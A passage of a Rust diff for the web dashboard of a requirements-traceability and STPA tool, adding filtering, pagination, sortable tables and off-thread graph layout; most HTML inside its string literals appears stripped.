) -> Html { @@ -3107,17 +729,21 @@ async fn graph_view( ..SvgOptions::default() }; + let budget = params.budget.unwrap_or(300).min(1000); let layout_opts = LayoutOptions { node_width: 200.0, node_height: 56.0, rank_separation: 90.0, node_separation: 30.0, + max_nodes: Some(budget), ..Default::default() }; - let gl = pgv_layout::layout( - &sub, - &|_idx, n| { + // Pre-collect owned node/edge info while holding the read lock. 
+ let node_infos: std::collections::HashMap = sub + .node_indices() + .map(|idx| { + let n = &sub[idx]; let atype = store .get(n.as_str()) .map(|a| a.artifact_type.clone()) @@ -3133,29 +759,55 @@ async fn graph_view( } else { Some(title) }; - NodeInfo { - id: n.clone(), - label: n.clone(), - node_type: atype, - sublabel, - } - }, - &|_idx, e| EdgeInfo { label: e.clone() }, - &layout_opts, - ); - - let svg = render_svg(&gl, &svg_opts); - - // Collect which types are actually present for the legend - let present_types: std::collections::BTreeSet = sub - .node_indices() - .filter_map(|idx| { - store - .get(sub[idx].as_str()) - .map(|a| a.artifact_type.clone()) + ( + idx, + NodeInfo { + id: n.clone(), + label: n.clone(), + node_type: atype, + sublabel, + parent: None, + ports: vec![], + }, + ) }) .collect(); + // Collect present types for the legend before sub is moved. + let present_types: std::collections::BTreeSet = node_infos + .values() + .map(|info| info.node_type.clone()) + .filter(|t| !t.is_empty()) + .collect(); + + // Run layout + SVG render in spawn_blocking to avoid blocking the async runtime. + // Returns (svg_string, node_count, edge_count). + let (svg, node_count, edge_count) = tokio::task::spawn_blocking(move || { + let gl = pgv_layout::layout( + &sub, + &|idx, _n| { + node_infos.get(&idx).cloned().unwrap_or_else(|| NodeInfo { + id: String::new(), + label: String::new(), + node_type: String::new(), + sublabel: None, + parent: None, + ports: vec![], + }) + }, + &|_idx, e| EdgeInfo { + label: e.clone(), + source_port: None, + target_port: None, + }, + &layout_opts, + ); + let svg = render_svg(&gl, &svg_opts); + (svg, gl.nodes.len(), gl.edges.len()) + }) + .await + .unwrap(); + // Build filter controls let mut html = String::from("

    Traceability Graph

    "); @@ -3236,9 +888,14 @@ async fn graph_view( } html.push_str(""); - // SVG card with zoom controls + // SVG card with zoom controls + viewer toolbar html.push_str( - "
    \ + "
    \ +
    \ + \ + \ + \ +
    \
    \
    \ \ @@ -3251,8 +908,8 @@ async fn graph_view( html.push_str(&format!( "

    {} nodes, {} edges — scroll to zoom, drag to pan, click nodes to navigate

    ", - gl.nodes.len(), - gl.edges.len() + node_count, + edge_count )); Html(html) @@ -3261,7 +918,7 @@ async fn graph_view( // ── Ego graph for a single artifact ────────────────────────────────────── #[derive(Debug, serde::Deserialize)] -struct EgoParams { +pub(crate) struct EgoParams { #[serde(default = "default_ego_hops")] hops: usize, } @@ -3270,7 +927,7 @@ fn default_ego_hops() -> usize { 2 } -async fn artifact_graph( +pub(crate) async fn artifact_graph( State(state): State, Path(id): Path, Query(params): Query, @@ -3334,9 +991,15 @@ async fn artifact_graph( label: n.clone(), node_type: atype, sublabel, + parent: None, + ports: vec![], } }, - &|_idx, e| EdgeInfo { label: e.clone() }, + &|_idx, e| EdgeInfo { + label: e.clone(), + source_port: None, + target_port: None, + }, &layout_opts, ); @@ -3381,9 +1044,14 @@ async fn artifact_graph( } html.push_str("
    "); - // SVG with zoom controls + // SVG with zoom controls + viewer toolbar html.push_str( - "
    \ + "
    \ +
    \ + \ + \ + \ +
    \
    \
    \ \ @@ -3502,92 +1170,338 @@ fn apply_filters_to_graph( // ── Validation ─────────────────────────────────────────────────────────── -async fn validate_view(State(state): State) -> Html { +pub(crate) async fn validate_view( + State(state): State, + Query(params): Query, +) -> Html { let state = state.read().await; - let diagnostics = validate::validate(&state.store, &state.schema, &state.graph); + let all_diagnostics = validate::validate(&state.store, &state.schema, &state.graph); - let errors = diagnostics + // Summary counts are always over ALL diagnostics (unfiltered). + let errors_total = all_diagnostics .iter() .filter(|d| d.severity == Severity::Error) .count(); - let warnings = diagnostics + let warnings_total = all_diagnostics .iter() .filter(|d| d.severity == Severity::Warning) .count(); - let infos = diagnostics + let infos_total = all_diagnostics .iter() .filter(|d| d.severity == Severity::Info) .count(); let mut html = String::from("

    Validation Results

    "); - // Colored summary bar - let total_issues = errors + warnings + infos; + // Colored summary bar (unfiltered totals). + let total_issues = errors_total + warnings_total + infos_total; if total_issues == 0 { html.push_str("
    All checks passed
    "); } else { html.push_str(&format!( - "
    {total_issues} issue{} found — {errors} error{}, {warnings} warning{}, {infos} info
    ", + "
    {total_issues} issue{} found — \ + {errors_total} error{}, {warnings_total} warning{}, {infos_total} info
    ", if total_issues != 1 { "s" } else { "" }, - if errors != 1 { "s" } else { "" }, - if warnings != 1 { "s" } else { "" }, + if errors_total != 1 { "s" } else { "" }, + if warnings_total != 1 { "s" } else { "" }, + )); + } + + // ── Severity filter bar ──────────────────────────────────────────── + // We repurpose the `status` param for severity selection and `types` + // param for artifact-type filtering. `q` is free-text search. + let active_severity = params.status.as_deref().unwrap_or(""); + let active_types = params.type_list(); + let search_q = params.q.as_deref().unwrap_or("").to_lowercase(); + + // Collect all artifact types that appear in diagnostics for type filter. + let mut diag_types: Vec = { + let mut seen = std::collections::BTreeSet::new(); + for d in &all_diagnostics { + if let Some(id) = &d.artifact_id + && let Some(a) = state.store.get(id) + { + seen.insert(a.artifact_type.clone()); + } + } + seen.into_iter().collect() + }; + diag_types.sort(); + + // Severity quick-filter buttons. + html.push_str( + "
    ", + ); + html.push_str("
    "); + html.push_str("Severity:"); + for (val, label, badge_cls) in [ + ("", "All", ""), + ("error", "Errors", "badge-error"), + ("warning", "Warnings", "badge-warn"), + ("info", "Info", "badge-info"), + ] { + let is_active = active_severity == val; + let qs = params.to_query_string(&[("status", val), ("page", "1")]); + let border = if is_active { + "border:2px solid var(--accent)" + } else { + "border:1px solid var(--border)" + }; + let badge_part = if badge_cls.is_empty() { + String::new() + } else { + format!( + " {}", + badge_cls, label + ) + }; + html.push_str(&format!( + "{label}{badge_part}", + qs = qs, + label = label, + border = border, + badge_part = badge_part, )); } - if diagnostics.is_empty() { - html.push_str("

    No issues found.

    "); - return Html(html); + // Type filter checkboxes (only if we have type info). + if !diag_types.is_empty() { + html.push_str( + "Type:", + ); + for t in &diag_types { + let checked = if active_types.contains(t) { + " checked" + } else { + "" + }; + html.push_str(&format!( + "", + t_esc = html_escape(t), + checked = checked, + )); + } + } + + // Search box. + let q_val = params.q.as_deref().unwrap_or(""); + html.push_str(&format!( + "
    \ + Search:\ + \ +
    ", + html_escape(q_val), + )); + + // Clear link. + html.push_str( + "Clear", + ); + html.push_str("
    "); // inner flex + filter-bar + + // JS: wire up type checkboxes + search box. + html.push_str( + r#""#, + ); + + if all_diagnostics.is_empty() { + html.push_str("

    No issues found.

    "); + return Html(html); + } + + // ── Apply filters ────────────────────────────────────────────────── + // Sort: errors first, then warnings, then info (stable baseline). + let mut sorted = all_diagnostics; + sorted.sort_by_key(|d| match d.severity { + Severity::Error => 0, + Severity::Warning => 1, + Severity::Info => 2, + }); + + // Apply user sort override on top. + match params.sort.as_deref() { + Some("id") => { + let asc = params.sort_ascending(); + sorted.sort_by(|a, b| { + let ai = a.artifact_id.as_deref().unwrap_or(""); + let bi = b.artifact_id.as_deref().unwrap_or(""); + if asc { ai.cmp(bi) } else { bi.cmp(ai) } + }); + } + Some("severity") => { + let asc = params.sort_ascending(); + sorted.sort_by_key(|d| { + let k = match d.severity { + Severity::Error => 0usize, + Severity::Warning => 1, + Severity::Info => 2, + }; + if asc { k } else { 2 - k } + }); + } + Some("message") => { + let asc = params.sort_ascending(); + sorted.sort_by(|a, b| { + if asc { + a.message.cmp(&b.message) + } else { + b.message.cmp(&a.message) + } + }); + } + _ => {} + } + + // Filter by severity (status param). + if !active_severity.is_empty() { + sorted.retain(|d| { + let sev = match d.severity { + Severity::Error => "error", + Severity::Warning => "warning", + Severity::Info => "info", + }; + sev == active_severity + }); + } + + // Filter by artifact type (types param). + if !active_types.is_empty() { + sorted.retain(|d| { + if let Some(id) = &d.artifact_id + && let Some(a) = state.store.get(id) + { + return active_types.contains(&a.artifact_type); + } + false + }); + } + + // Filter by text query (q param). 
+ if !search_q.is_empty() { + sorted.retain(|d| { + let id_match = d + .artifact_id + .as_deref() + .unwrap_or("") + .to_lowercase() + .contains(&search_q); + let msg_match = d.message.to_lowercase().contains(&search_q); + id_match || msg_match + }); } - html.push_str( - "", - ); + // ── Paginate ─────────────────────────────────────────────────────── + let (page_slice, total_filtered) = paginate(&sorted, ¶ms); - // Show errors first, then warnings, then info - let mut sorted = diagnostics; - sorted.sort_by_key(|d| match d.severity { - Severity::Error => 0, - Severity::Warning => 1, - Severity::Info => 2, - }); + html.push_str(&pagination(total_filtered, ¶ms, "/validate")); - for d in &sorted { - let sev = match d.severity { - Severity::Error => "ERROR", - Severity::Warning => "WARN", - Severity::Info => "INFO", - }; - let art_id = d.artifact_id.as_deref().unwrap_or("-"); - let art_link = if d.artifact_id.is_some() && state.store.contains(art_id) { - format!( - "{art}", - art = html_escape(art_id) - ) - } else { - html_escape(art_id) - }; - html.push_str(&format!( - "", - html_escape(&d.rule), - html_escape(&d.message) - )); - } + // ── Table ────────────────────────────────────────────────────────── + let columns = [ + Column { + key: "severity".into(), + label: "Severity".into(), + sortable: true, + }, + Column { + key: "id".into(), + label: "Artifact".into(), + sortable: true, + }, + Column { + key: "rule".into(), + label: "Rule".into(), + sortable: false, + }, + Column { + key: "message".into(), + label: "Message".into(), + sortable: true, + }, + ]; + + let rows: Vec> = page_slice + .iter() + .map(|d| { + let sev = match d.severity { + Severity::Error => "ERROR".to_string(), + Severity::Warning => "WARN".to_string(), + Severity::Info => "INFO".to_string(), + }; + let art_id = d.artifact_id.as_deref().unwrap_or("-"); + let art_link = if d.artifact_id.is_some() && state.store.contains(art_id) { + format!( + "{art}", + art = html_escape(art_id) + ) + } else { + 
html_escape(art_id) + }; + vec![ + sev, + art_link, + html_escape(&d.rule), + html_escape(&d.message), + ] + }) + .collect(); + + html.push_str(&sortable_table(&TableConfig { + base_url: "/validate", + columns: &columns, + rows: &rows, + params: ¶ms, + })); + + html.push_str(&pagination(total_filtered, ¶ms, "/validate")); - html.push_str("
    SeverityArtifactRuleMessage
    {sev}{art_link}{}{}
    "); Html(html) } // ── Traceability Matrix ────────────────────────────────────────────────── #[derive(Debug, serde::Deserialize)] -struct MatrixParams { +pub(crate) struct MatrixParams { from: Option, to: Option, link: Option, direction: Option, } -async fn matrix_view( +pub(crate) async fn matrix_view( State(state): State, Query(params): Query, ) -> Html { @@ -3709,7 +1623,7 @@ async fn matrix_view( // ── Coverage ───────────────────────────────────────────────────────────── -async fn coverage_view(State(state): State) -> Html { +pub(crate) async fn coverage_view(State(state): State) -> Html { let state = state.read().await; let report = coverage::compute_coverage(&state.store, &state.schema, &state.graph); let overall = report.overall_coverage(); @@ -3831,7 +1745,7 @@ async fn coverage_view(State(state): State) -> Html { // ── Documents ──────────────────────────────────────────────────────────── -async fn documents_list(State(state): State) -> Html { +pub(crate) async fn documents_list(State(state): State) -> Html { let state = state.read().await; let doc_store = &state.doc_store; @@ -3879,7 +1793,10 @@ async fn documents_list(State(state): State) -> Html { Html(html) } -async fn document_detail(State(state): State, Path(id): Path) -> Html { +pub(crate) async fn document_detail( + State(state): State, + Path(id): Path, +) -> Html { let state = state.read().await; let doc_store = &state.doc_store; let store = &state.store; @@ -4016,7 +1933,7 @@ async fn document_detail(State(state): State, Path(id): Path, } @@ -4031,7 +1948,7 @@ struct SearchHit { url: String, } -async fn search_view( +pub(crate) async fn search_view( State(state): State, Query(params): Query, ) -> Html { @@ -4090,31 +2007,31 @@ async fn search_view( }); continue; } - if let Some(desc) = &artifact.description { - if desc.to_lowercase().contains(&query_lower) { - let desc_lower = desc.to_lowercase(); - let pos = desc_lower.find(&query_lower).unwrap_or(0); - let start = pos.saturating_sub(40); 
- let end = (pos + query.len() + 40).min(desc.len()); - let mut snippet = String::new(); - if start > 0 { - snippet.push_str("..."); - } - snippet.push_str(&desc[start..end]); - if end < desc.len() { - snippet.push_str("..."); - } - hits.push(SearchHit { - id: artifact.id.clone(), - title: artifact.title.clone(), - kind: "artifact", - type_name: artifact.artifact_type.clone(), - matched_field: "description", - context: snippet, - url: format!("/artifacts/{}", artifact.id), - }); - continue; + if let Some(desc) = &artifact.description + && desc.to_lowercase().contains(&query_lower) + { + let desc_lower = desc.to_lowercase(); + let pos = desc_lower.find(&query_lower).unwrap_or(0); + let start = pos.saturating_sub(40); + let end = (pos + query.len() + 40).min(desc.len()); + let mut snippet = String::new(); + if start > 0 { + snippet.push_str("..."); } + snippet.push_str(&desc[start..end]); + if end < desc.len() { + snippet.push_str("..."); + } + hits.push(SearchHit { + id: artifact.id.clone(), + title: artifact.title.clone(), + kind: "artifact", + type_name: artifact.artifact_type.clone(), + matched_field: "description", + context: snippet, + url: format!("/artifacts/{}", artifact.id), + }); + continue; } for tag in &artifact.tags { if tag.to_lowercase().contains(&query_lower) { @@ -4268,7 +2185,7 @@ fn highlight_match(text: &str, query: &str) -> String { // ── Verification ───────────────────────────────────────────────────────── -async fn verification_view(State(state): State) -> Html { +pub(crate) async fn verification_view(State(state): State) -> Html { let state = state.read().await; let store = &state.store; let graph = &state.graph; @@ -4571,16 +2488,19 @@ async fn verification_view(State(state): State) -> Html { // ── STPA ───────────────────────────────────────────────────────────────── -async fn stpa_view(State(state): State) -> Html { +pub(crate) async fn stpa_view( + State(state): State, + Query(params): Query, +) -> Html { let state = state.read().await; 
- stpa_partial(&state) + stpa_partial(&state, ¶ms) } -fn stpa_partial(state: &AppState) -> Html { +fn stpa_partial(state: &AppState, params: &ViewParams) -> Html { let store = &state.store; let graph = &state.graph; - let stpa_types = [ + let stpa_type_list: &[(&str, &str)] = &[ ("loss", "Losses"), ("hazard", "Hazards"), ("sub-hazard", "Sub-Hazards"), @@ -4593,7 +2513,10 @@ fn stpa_partial(state: &AppState) -> Html { ("loss-scenario", "Loss Scenarios"), ]; - let total: usize = stpa_types.iter().map(|(t, _)| store.count_by_type(t)).sum(); + let total: usize = stpa_type_list + .iter() + .map(|(t, _)| store.count_by_type(t)) + .sum(); let mut html = String::from("

    STPA Analysis

    "); @@ -4609,13 +2532,54 @@ fn stpa_partial(state: &AppState) -> Html { return Html(html); } - // Summary stat cards + // ── Filter bar ────────────────────────────────────────────────────── + let available_types: Vec = stpa_type_list.iter().map(|(t, _)| t.to_string()).collect(); + // UCA type sub-filter values used as "status" in the filter bar + let uca_subtypes: Vec = vec![ + "not-providing".into(), + "providing".into(), + "too-early-too-late".into(), + "stopped-too-soon".into(), + ]; + html.push_str(&filter_bar(&FilterBarConfig { + base_url: "/stpa", + available_types: &available_types, + available_statuses: &uca_subtypes, + params, + })); + + // ── Active filters ─────────────────────────────────────────────────── + let active_types = params.type_list(); + let search_q = params.q.as_deref().unwrap_or("").to_lowercase(); + let uca_subtype_filter = params.status.as_deref().unwrap_or(""); + + /// Returns true if an artifact ID/title passes the current search + type filters. + fn artifact_matches( + id: &str, + title: &str, + artifact_type: &str, + active_types: &[String], + search_q: &str, + ) -> bool { + if !active_types.is_empty() && !active_types.iter().any(|t| t == artifact_type) { + return false; + } + if !search_q.is_empty() + && !id.to_lowercase().contains(search_q) + && !title.to_lowercase().contains(search_q) + { + return false; + } + true + } + + // ── Summary stat cards ─────────────────────────────────────────────── html.push_str("
    "); let stat_colors = [ "#dc3545", "#fd7e14", "#fd7e14", "#20c997", "#6f42c1", "#6610f2", "#17a2b8", "#e83e8c", "#20c997", "#e83e8c", ]; - for (i, (type_name, label)) in stpa_types.iter().enumerate() { + for (i, (type_name, label)) in stpa_type_list.iter().enumerate() { let count = store.count_by_type(type_name); if count == 0 { continue; @@ -4629,8 +2593,52 @@ fn stpa_partial(state: &AppState) -> Html { } html.push_str("
    "); - // Hierarchy tree view - html.push_str("

    STPA Hierarchy

    "); + // ── Determine open IDs ─────────────────────────────────────────────── + // If no `open` param, default to expanding all losses and top-level hazards. + let open_ids: Vec = if params.open.is_some() { + params.open_list() + } else { + // Default: open all losses and all hazards + let mut ids: Vec = store.by_type("loss").to_vec(); + for h in store.by_type("hazard") { + ids.push(h.clone()); + } + ids.sort(); + ids + }; + + // ── Build expand/collapse all URLs ─────────────────────────────────── + // Collect all loss + hazard IDs for "expand all" at the hierarchy level + let all_tree_ids: Vec = { + let mut ids: Vec = store.by_type("loss").to_vec(); + for h in store.by_type("hazard") { + ids.push(h.clone()); + } + for u in store.by_type("uca") { + ids.push(u.clone()); + } + ids.sort(); + ids + }; + let expand_qs = params.to_query_string(&[("open", &all_tree_ids.join(","))]); + let collapse_qs = params.to_query_string(&[("open", "")]); + + // ── Hierarchy tree view ────────────────────────────────────────────── + html.push_str("

    STPA Hierarchy

    "); + + // Expand/Collapse buttons + html.push_str(&format!( + "" + )); + + html.push_str("
    "); let losses = store.by_type("loss"); if losses.is_empty() { @@ -4639,14 +2647,28 @@ fn stpa_partial(state: &AppState) -> Html { ); } - let mut sorted_losses: Vec<&str> = losses.iter().map(|s| s.as_str()).collect(); + let mut sorted_losses: Vec = losses.to_vec(); sorted_losses.sort(); + // Count visible losses for filtered-empty message + let mut visible_loss_count = 0usize; + for loss_id in &sorted_losses { let Some(loss) = store.get(loss_id) else { continue; }; - html.push_str("
    "); + + // Apply type + search filter at loss level + if !artifact_matches(loss_id, &loss.title, "loss", &active_types, &search_q) { + continue; + } + visible_loss_count += 1; + + let loss_open = open_ids.iter().any(|id| id == loss_id); + let open_attr = if loss_open { " open" } else { "" }; + html.push_str(&format!( + "
    " + )); html.push_str(" "); html.push_str(&badge_for_type("loss")); html.push_str(&format!( @@ -4670,7 +2692,29 @@ fn stpa_partial(state: &AppState) -> Html { let Some(hazard) = store.get(hazard_id) else { continue; }; - html.push_str("
    "); + + // Filter hazards if type filter is active for hazard types + // (only hide when filtering specifically for non-hazard types) + let hazard_visible = active_types.is_empty() + || active_types + .iter() + .any(|t| t == "hazard" || t == "sub-hazard") + || artifact_matches( + hazard_id, + &hazard.title, + &hazard.artifact_type, + &active_types, + &search_q, + ); + if !hazard_visible { + continue; + } + + let hazard_open = open_ids.iter().any(|id| id == *hazard_id); + let h_open_attr = if hazard_open { " open" } else { "" }; + html.push_str(&format!( + "
    " + )); html.push_str(" "); html.push_str("leads-to-loss"); html.push_str(&badge_for_type(&hazard.artifact_type)); @@ -4732,8 +2776,32 @@ fn stpa_partial(state: &AppState) -> Html { let Some(uca) = store.get(uca_id) else { continue; }; - // Collapse below level 2 - html.push_str("
    "); + + // Apply UCA subtype filter + if !uca_subtype_filter.is_empty() { + let ut = uca + .fields + .get("uca-type") + .and_then(|v| v.as_str()) + .unwrap_or(""); + if ut != uca_subtype_filter { + continue; + } + } + + // Apply search filter to UCAs + if !search_q.is_empty() + && !uca_id.to_lowercase().contains(&search_q) + && !uca.title.to_lowercase().contains(&search_q) + { + continue; + } + + let uca_open = open_ids.iter().any(|id| id == *uca_id); + let u_open_attr = if uca_open { " open" } else { "" }; + html.push_str(&format!( + "
    " + )); html.push_str(" "); html.push_str("leads-to-hazard"); html.push_str(&badge_for_type("uca")); @@ -4799,11 +2867,17 @@ fn stpa_partial(state: &AppState) -> Html { html.push_str("
    "); // Loss } + if visible_loss_count == 0 && !sorted_losses.is_empty() { + html.push_str( + "

    No losses match the current filter.

    ", + ); + } + html.push_str("
    "); // stpa-tree, card - // UCA Table - let uca_ids = store.by_type("uca"); - if !uca_ids.is_empty() { + // ── UCA Table ──────────────────────────────────────────────────────── + let all_uca_ids_slice = store.by_type("uca"); + if !all_uca_ids_slice.is_empty() { html.push_str("

    Unsafe Control Actions

    "); struct UcaRow { @@ -4815,8 +2889,8 @@ fn stpa_partial(state: &AppState) -> Html { } let mut rows: Vec = Vec::new(); - for uca_id in uca_ids { - let Some(uca) = store.get(uca_id) else { + for uca_id in all_uca_ids_slice { + let Some(uca) = store.get(uca_id.as_str()) else { continue; }; let uca_type = uca @@ -4825,6 +2899,25 @@ fn stpa_partial(state: &AppState) -> Html { .and_then(|v| v.as_str()) .unwrap_or("-") .to_string(); + + // Apply UCA subtype filter to the table too + if !uca_subtype_filter.is_empty() && uca_type != uca_subtype_filter { + continue; + } + + // Apply type filter (only show if "uca" is in types or no type filter) + if !active_types.is_empty() && !active_types.iter().any(|t| t == "uca") { + continue; + } + + // Apply search filter + if !search_q.is_empty() + && !uca_id.to_lowercase().contains(&search_q) + && !uca.title.to_lowercase().contains(&search_q) + { + continue; + } + let controller_links: Vec<&str> = uca .links .iter() @@ -4868,64 +2961,71 @@ fn stpa_partial(state: &AppState) -> Html { .then(a.id.cmp(&b.id)) }); - html.push_str( - "\ - \ - \ - ", - ); + if rows.is_empty() { + html.push_str( + "

    No UCAs match the current filter.

    ", + ); + } else { + html.push_str( + "
    IDControl ActionUCA TypeDescriptionLinked Hazards
    \ + \ + \ + ", + ); - for row in &rows { - let type_class = match row.uca_type.as_str() { - "not-providing" => "uca-type-not-providing", - "providing" => "uca-type-providing", - "too-early-too-late" => "uca-type-too-early-too-late", - "stopped-too-soon" => "uca-type-stopped-too-soon", - _ => "", - }; - let type_badge = if type_class.is_empty() { - html_escape(&row.uca_type) - } else { - format!( - "{}", - html_escape(&row.uca_type), - ) - }; - let hazard_links: Vec = row - .linked_hazards - .iter() - .map(|h| { + for row in &rows { + let type_class = match row.uca_type.as_str() { + "not-providing" => "uca-type-not-providing", + "providing" => "uca-type-providing", + "too-early-too-late" => "uca-type-too-early-too-late", + "stopped-too-soon" => "uca-type-stopped-too-soon", + _ => "", + }; + let type_badge = if type_class.is_empty() { + html_escape(&row.uca_type) + } else { + format!( + "{}", + html_escape(&row.uca_type), + ) + }; + let hazard_links: Vec = row + .linked_hazards + .iter() + .map(|h| { + format!( + "{id}", + id = html_escape(h), + ) + }) + .collect(); + let ca_display = if row.control_action == "-" { + "-".to_string() + } else { format!( "{id}", - id = html_escape(h), + style=\"font-family:var(--mono);font-size:.8rem\">{id}", + id = html_escape(&row.control_action), ) - }) - .collect(); - let ca_display = if row.control_action == "-" { - "-".to_string() - } else { - format!( - "{id}", - id = html_escape(&row.control_action), - ) - }; - html.push_str(&format!( - "\ - \ - \ - \ - \ - ", - id = html_escape(&row.id), - ca = ca_display, - title = html_escape(&row.title), - hazards = hazard_links.join(", "), - )); - } + }; + html.push_str(&format!( + "\ + \ + \ + \ + \ + ", + id = html_escape(&row.id), + ca = ca_display, + title = html_escape(&row.title), + hazards = hazard_links.join(", "), + )); + } - html.push_str("
    IDControl ActionUCA TypeDescriptionLinked Hazards
    {id}{ca}{type_badge}{title}{hazards}
    {id}{ca}{type_badge}{title}{hazards}
    "); + html.push_str(""); + } + html.push_str("
    "); } html.push_str(&format!( @@ -4937,7 +3037,7 @@ fn stpa_partial(state: &AppState) -> Html { // ── Results ────────────────────────────────────────────────────────────── -async fn results_view(State(state): State) -> Html { +pub(crate) async fn results_view(State(state): State) -> Html { let state = state.read().await; let result_store = &state.result_store; @@ -5026,7 +3126,7 @@ async fn results_view(State(state): State) -> Html { Html(html) } -async fn result_detail( +pub(crate) async fn result_detail( State(state): State, Path(run_id): Path, ) -> Html { @@ -5224,7 +3324,7 @@ fn render_tree(entries: &[TreeEntry], html: &mut String, depth: usize) { html.push_str(""); } -async fn source_tree_view(State(state): State) -> Html { +pub(crate) async fn source_tree_view(State(state): State) -> Html { let state = state.read().await; let project_path = &state.project_path_buf; let tree = build_tree(project_path, "", 0); @@ -5282,31 +3382,31 @@ fn artifacts_referencing_file(store: &rivet_core::store::Store, file_rel: &str) for a in store.iter() { // Check source_file (existing behavior) - if let Some(sf) = &a.source_file { - if sf == rel || sf.ends_with(file_rel) { + if let Some(sf) = &a.source_file + && (sf == rel || sf.ends_with(file_rel)) + { + refs.push(FileRef { + id: a.id.clone(), + artifact_type: a.artifact_type.clone(), + title: a.title.clone(), + line: None, + end_line: None, + }); + continue; + } + // Scan string fields for file:line references matching this file + for value in a.fields.values() { + if let serde_yaml::Value::String(s) = value + && let Some((_file, line, end_line)) = extract_file_ref(s, file_rel) + { refs.push(FileRef { id: a.id.clone(), artifact_type: a.artifact_type.clone(), title: a.title.clone(), - line: None, - end_line: None, + line, + end_line, }); - continue; - } - } - // Scan string fields for file:line references matching this file - for value in a.fields.values() { - if let serde_yaml::Value::String(s) = value { - if let 
Some((_file, line, end_line)) = extract_file_ref(s, file_rel) { - refs.push(FileRef { - id: a.id.clone(), - artifact_type: a.artifact_type.clone(), - title: a.title.clone(), - line, - end_line, - }); - break; // one ref per artifact is enough - } + break; // one ref per artifact is enough } } } @@ -5340,7 +3440,7 @@ fn extract_file_ref(val: &str, target_file: &str) -> Option<(String, Option Some((target_file.to_string(), None, None)) } -async fn source_file_view( +pub(crate) async fn source_file_view( State(state): State, Path(raw_path): Path, ) -> Html { @@ -6005,7 +4105,7 @@ fn render_code_block( // ── Diff ───────────────────────────────────────────────────────────────── #[derive(Debug, serde::Deserialize)] -struct DiffParams { +pub(crate) struct DiffParams { base: Option, head: Option, } @@ -6124,7 +4224,7 @@ fn diff_ref_options(sel: &str, tags: &[String], branches: &[String], inc_wt: boo h } -async fn diff_view( +pub(crate) async fn diff_view( State(state): State, Query(params): Query, ) -> Html { @@ -6249,7 +4349,7 @@ async fn diff_view( // ── Document linkage view ──────────────────────────────────────────────── -async fn doc_linkage_view(State(state): State) -> Html { +pub(crate) async fn doc_linkage_view(State(state): State) -> Html { let state = state.read().await; let store = &state.store; let doc_store = &state.doc_store; @@ -6348,13 +4448,13 @@ async fn doc_linkage_view(State(state): State) -> Html { for (aid, src_node) in &art_to_node { if let Some(a) = store.get(aid) { for link in &a.links { - if let Some(tgt_node) = art_to_node.get(&link.target) { - if tgt_node != src_node { - edge_types - .entry((src_node.clone(), tgt_node.clone())) - .or_default() - .insert(link.link_type.clone()); - } + if let Some(tgt_node) = art_to_node.get(&link.target) + && tgt_node != src_node + { + edge_types + .entry((src_node.clone(), tgt_node.clone())) + .or_default() + .insert(link.link_type.clone()); } } } @@ -6426,15 +4526,26 @@ async fn doc_linkage_view(State(state): 
State) -> Html { label: label.clone(), node_type: node_type.into(), sublabel, + parent: None, + ports: vec![], } }, - &|_idx, e| EdgeInfo { label: e.clone() }, + &|_idx, e| EdgeInfo { + label: e.clone(), + source_port: None, + target_port: None, + }, &layout_opts, ); let svg = render_svg(&gl, &svg_opts); html.push_str( - "
    \ + "
    \ +
    \ + \ + \ + \ +
    \
    \
    \ \ @@ -6469,10 +4580,11 @@ async fn doc_linkage_view(State(state): State) -> Html { for aid in &doc.artifact_ids { if let Some(a) = store.get(aid) { for link in &a.links { - if let Some(target_doc) = art_to_doc.get(&link.target) { - if target_doc != &doc.id { - cross_link_count += 1; - html.push_str(&format!( + if let Some(target_doc) = art_to_doc.get(&link.target) + && target_doc != &doc.id + { + cross_link_count += 1; + html.push_str(&format!( "{src_doc}\ {aid}\ {lt}\ @@ -6483,7 +4595,6 @@ async fn doc_linkage_view(State(state): State) -> Html { tgt = html_escape(&link.target), tgt_doc = html_escape(target_doc), )); - } } } } @@ -6555,14 +4666,14 @@ async fn doc_linkage_view(State(state): State) -> Html { // ── Traceability explorer ──────────────────────────────────────────────── #[derive(Debug, serde::Deserialize)] -struct TraceParams { +pub(crate) struct TraceParams { root_type: Option, status: Option, search: Option, } #[derive(Debug, serde::Deserialize)] -struct TraceHistoryParams { +pub(crate) struct TraceHistoryParams { file: Option, } @@ -6682,9 +4793,10 @@ fn render_trace_node(node: &TraceNode, depth: usize, project_path: &str) -> Stri } } -async fn traceability_view( +pub(crate) async fn traceability_view( State(state): State, Query(params): Query, + Query(view_params): Query, ) -> Html { let state = state.read().await; let store = &state.store; @@ -6703,7 +4815,20 @@ async fn traceability_view( }; let root_type = params.root_type.as_deref().unwrap_or(default_root); let status_filter = params.status.as_deref().unwrap_or("all"); - let search_filter = params.search.as_deref().unwrap_or("").to_lowercase(); + + // `q` from ViewParams overrides the legacy `search` param if provided. 
+ let search_filter = { + let q = view_params.q.as_deref().unwrap_or("").trim(); + if !q.is_empty() { + q.to_lowercase() + } else { + params.search.as_deref().unwrap_or("").to_lowercase() + } + }; + + // ViewParams `types`: filter root artifacts to only those whose + // artifact_type matches one of the listed types. + let type_filter = view_params.type_list(); // Get root artifacts let mut root_ids: Vec<&str> = store @@ -6722,7 +4847,7 @@ async fn traceability_view( if status_filter != "all" && a.status.as_deref().unwrap_or("") != status_filter { return false; } - // Search filter + // Text search filter (ID or title) if !search_filter.is_empty() { let id_match = id.to_lowercase().contains(&search_filter); let title_match = a.title.to_lowercase().contains(&search_filter); @@ -6730,6 +4855,10 @@ async fn traceability_view( return false; } } + // ViewParams types filter + if !type_filter.is_empty() && !type_filter.contains(&a.artifact_type) { + return false; + } true } else { false @@ -6740,7 +4869,8 @@ async fn traceability_view( let mut html = String::from("

    Traceability Explorer

    "); // ── Filter controls ────────────────────────────────────────────── - html.push_str("
    "); + let q_val = view_params.q.as_deref().unwrap_or(""); + html.push_str("
    "); html.push_str("
    "); + // Search uses `q` (ViewParams) so it is preserved in URL alongside other ViewParams. html.push_str(&format!( - "
    ", - html_escape(&search_filter) + "
    ", + html_escape(q_val) )); + // Type filter checkboxes — all artifact types in store. + if !all_types.is_empty() { + html.push_str("
    "); + html.push_str(""); + for t in &all_types { + let checked = if type_filter.contains(&t.to_string()) { + " checked" + } else { + "" + }; + html.push_str(&format!( + "", + t_esc = html_escape(t), + checked = checked, + )); + } + html.push_str("
    "); + } html.push_str("
    "); html.push_str("
